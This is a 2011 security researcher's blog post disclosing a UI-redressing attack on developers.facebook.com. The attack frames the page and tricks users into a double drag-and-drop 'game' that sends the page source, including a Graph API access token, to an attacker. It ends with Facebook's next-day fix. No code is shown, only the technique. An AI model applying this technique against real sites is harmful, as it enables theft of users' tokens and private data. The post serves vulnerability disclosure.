13. September 2011

Stealing Facebook Graph API Access Token - Yet Another UI Redressing Vector

I was going through, developers.facebook.com and found that it allows itself to be IFramed. It includes all the documentation and examples for using the Facebook Graph API and other products like the Legacy REST API , FQL , Chat API . An attacker can do a whole lot of stuff with this once he IFrames this.

I decided to write on one of the attacks that is possible with this bug. As we all know, the documentation includes some real good examples for using the API with some nifty access tokens with the credentials of the currently logged in user. This special token in the documentation comes with some extra special rights like read_stream, user_status, user_birthday, user_relationships and much more rights which even your normal friends can’t see.

Stealing the Access Token :

Now the interesting part is to get the token sitting inside the source code. Its possible to steal this with many attack vectors and i decided to write a PoC using a Double Drag and Drop Technique which works on Firefox and IE . Google chrome can resist this attack , because it disallows X-Domain Drag & drop and also view-source can’t be IFRAMED.

Double Drag & Drop:

Heres the PoC which uses view-source to IFRAME the source code of the page containing the access token. Its better to use a double view-source to make everything as a text and disable all links , which are click-able. The trick is to fool the user (any chicken is fine) , by making him play a game with a ball and a trash can. I’ll show some screenshots of what a real attack would look like . A video would have been better , but am just lazy sometimes.

The attacker asks the user to drag the ball in to the basket
The attacker creates another ball and asks the user to repeat
The attacker asks the user to click Go to Win the game

What Really happened ?

Here is what happened behind the scenes !

First Drag, everything in the IFRAME gets Selected

Second Drag , the mighty cross-domain drag

The user clicks go and the source of the page is sent to the attacker

Heres the PoC code for that works on Firefox . Download Code

Response from Facebook Security:

I reported this bug to Facebook on August 28th, 2011 and the fix was up the very next day.